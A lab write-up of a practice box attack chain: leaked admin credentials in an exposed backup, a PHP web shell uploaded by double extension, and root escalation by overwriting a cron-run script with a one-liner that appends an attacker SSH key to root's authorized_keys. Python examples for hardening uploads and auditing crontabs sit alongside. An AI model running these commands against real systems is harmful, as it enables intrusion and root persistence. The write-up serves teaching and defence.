Server Room

A medium lab writeup built around exposed backups, weak admin controls, and a writable service script.

This lab mirrors the same kind of mistakes as Locker Room: a publicly listed backup folder, an admin panel protected by nothing more than leaked credentials and client-side checks, and a root cron job that trusts a file the web user can write. Nothing fancy, just a clean chain.

Recon

I started with a default-script and version scan, skipping host discovery (-Pn) since the target was known to be up, and saved the output for later reference.

nmap -sC -sV -Pn -oN nmap.txt target

Results (summarized):

  • 22/tcp open (SSH)
  • 80/tcp open (HTTP)

Web enumeration

The landing page was a basic status dashboard with a note about "maintenance exports". I ran a quick directory probe.

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://target/FUZZ -fs 0

Key hit:

  • /exports/ -> 200 with directory listing enabled

Inside /exports/ I found a timestamped backup:

  • exports_2026_03_15.zip

Unpacking it revealed a config file with an admin login.

ADMIN_USER=ops
ADMIN_PASS=opsonly

Foothold

The creds worked for the dashboard at /admin/. The panel had a "theme upload" feature. Client-side JavaScript rejected .php uploads, but the server never re-checked the final extension on its own, so a double extension that still ends in .php went through.

cp shell.php theme.css.php

Upload response:

{ "ok": true, "path": "/uploads/themes/theme.css.php" }

Requesting the uploaded path executed the PHP and dropped me a shell as the web server user.
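The server-side rule that let theme.css.php through is not shown in this writeup, so the weak check below is an assumption about what that panel was effectively doing. This is an added example, not code from the lab: it puts that weak rule beside a hardened check that trusts only a single, allowlisted final extension and never reuses the client-supplied name on disk.

```python
"""Added example: weak upload-name check beside a hardened one.
Not the lab's real panel code; weak_check is an assumed rule."""
import re
import secrets
from typing import Optional

# Only the final extension is trusted, and only if it is in this allowlist.
ALLOWED_EXTENSIONS = {"css"}

# One base name, one extension, nothing else: rejects theme.css.php,
# ../theme.css and names with a trailing newline (hence \Z rather than $).
SAFE_NAME = re.compile(r"\A[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,8})\Z")


def weak_check(filename: str) -> bool:
    """Assumed weak server-side rule: 'the name contains .css'.
    This is effectively what a server that stores theme.css.php is doing."""
    return ".css" in filename.lower()


def hardened_check(filename: str) -> bool:
    """Accept only a single, allowlisted final extension (case-insensitive)."""
    m = SAFE_NAME.match(filename)
    return bool(m) and m.group(1).lower() in ALLOWED_EXTENSIONS


def stored_name(filename: str) -> Optional[str]:
    """Return the on-disk name for an accepted upload, or None if rejected.
    The client-supplied name is never written to disk: a random token plus
    the allowlisted extension, so an attacker never controls the stored name."""
    if not hardened_check(filename):
        return None
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    for name in ("theme.css", "theme.css.php", "../theme.css", "theme.php"):
        print(f"{name:16} weak={weak_check(name)!s:5} "
              f"hardened={hardened_check(name)!s:5} stored={stored_name(name)}")
```

The filename check is only one layer: the upload directory should also be served with no script handler attached (no PHP execution under /uploads/), so that a future bypass of the name check still cannot turn an upload into code execution.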

Privilege escalation

A quick permission sweep showed a writable service script:

ls -la /opt/services/

The rotate-logs.sh script was owned by root but writable by the web user. A cron job ran it every minute.

cat /etc/crontab

Entry (summarized):

* * * * * root /opt/services/rotate-logs.sh

I replaced the script body with a one-liner that appends my public key to root's authorized_keys. The file has to stay a valid shell script (writing the key text straight into it would just make the cron job fail), and truncating it in place with > keeps root's ownership and the existing execute bit; a chmod from the web user would be refused anyway, since it does not own the file.

printf '#!/bin/sh\nmkdir -p /root/.ssh\necho "ssh-ed25519 AAAA... attacker@box" >> /root/.ssh/authorized_keys\n' > /opt/services/rotate-logs.sh

After the next tick, I could SSH in as root.
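The permission sweep above is the check defenders should be running too. As an added example (not code from the lab), the audit below parses /etc/crontab-style entries and reports every absolute path a job references that a non-owner could modify; the crontab text and the file tree it is run against are constructed to mirror the permissions this writeup describes.

```python
"""Added example: audit /etc/crontab-style jobs for writable targets.
Not from the lab; SAMPLE_CRONTAB and the demo tree are constructed."""
import os
import stat
import tempfile
from typing import List, Tuple

# Constructed sample in /etc/crontab format (five time fields, user, command).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user command
* * * * * root /opt/services/rotate-logs.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
0 3 * * * backup /usr/local/bin/backup.sh --quiet
"""


def parse_system_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (user, command) per job line; skips comments and VAR=value lines."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:          # SHELL=..., PATH=..., MAILTO=...
            continue
        if line.startswith("@"):             # @reboot / @hourly user command
            parts = line.split(None, 2)
            if len(parts) == 3:
                jobs.append((parts[1], parts[2]))
            continue
        parts = line.split(None, 6)          # 5 time fields, user, rest
        if len(parts) == 7:
            jobs.append((parts[5], parts[6]))
    return jobs


def writable_by_others(path: str) -> List[str]:
    """Ways a user other than the owner could change what this job executes."""
    reasons = []
    mode = os.stat(path).st_mode
    if mode & stat.S_IWOTH:
        reasons.append("file world-writable")
    elif mode & stat.S_IWGRP:
        reasons.append("file group-writable")
    parent_mode = os.stat(os.path.dirname(path)).st_mode
    if parent_mode & stat.S_IWOTH and not parent_mode & stat.S_ISVTX:
        reasons.append("directory world-writable, file can be replaced")
    return reasons


def audit_crontab(text: str, root_dir: str = "/") -> List[Tuple[str, str, str]]:
    """(user, path, reason) for every absolute path a job references that a
    non-owner can modify. root_dir lets the same check run over a mounted
    image or a constructed tree instead of the live filesystem."""
    findings = []
    for user, cmd in parse_system_crontab(text):
        for tok in cmd.split():
            if not tok.startswith("/"):
                continue
            path = os.path.join(root_dir, tok.lstrip("/"))
            if not os.path.isfile(path):
                continue
            for reason in writable_by_others(path):
                findings.append((user, tok, reason))
    return findings


def demo() -> List[Tuple[str, str, str]]:
    """Build a constructed tree with the lab's permission mistake and audit it."""
    root = tempfile.mkdtemp()
    for rel, mode in (("opt/services/rotate-logs.sh", 0o777),
                      ("usr/local/bin/backup.sh", 0o755)):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        os.chmod(os.path.dirname(path), 0o755)   # parent dir itself not writable
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return audit_crontab(SAMPLE_CRONTAB, root)


if __name__ == "__main__":
    for user, path, reason in demo():
        print(f"{user}: {path} ({reason})")
```

On a live host, feed it open("/etc/crontab").read() and the files under /etc/cron.d/, which share the same format with a user field; per-user crontabs from crontab -l have no user field and would need the split adjusted. The check only looks at the first-level target, so a root-owned script that itself sources a writable file is still a finding you have to chase by hand.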

Takeaways

  • Public backup folders leak secrets fast.
  • Admin panels often rely on client-side validation alone; every upload check has to be repeated on the server.
  • Writable scripts run by cron are a straight path to root.

This is another solid example of a low-friction chain that shows up in real assessments.
